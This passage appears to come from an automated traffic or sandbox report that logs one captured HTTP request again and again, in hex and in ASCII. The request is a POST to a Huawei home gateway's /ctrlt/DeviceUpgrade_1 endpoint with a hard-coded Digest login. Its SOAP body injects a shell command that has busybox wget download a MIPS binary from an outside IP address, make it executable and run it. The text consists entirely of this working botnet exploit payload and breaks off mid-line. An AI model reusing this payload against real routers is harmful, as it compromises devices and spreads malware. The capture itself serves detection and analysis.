3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r 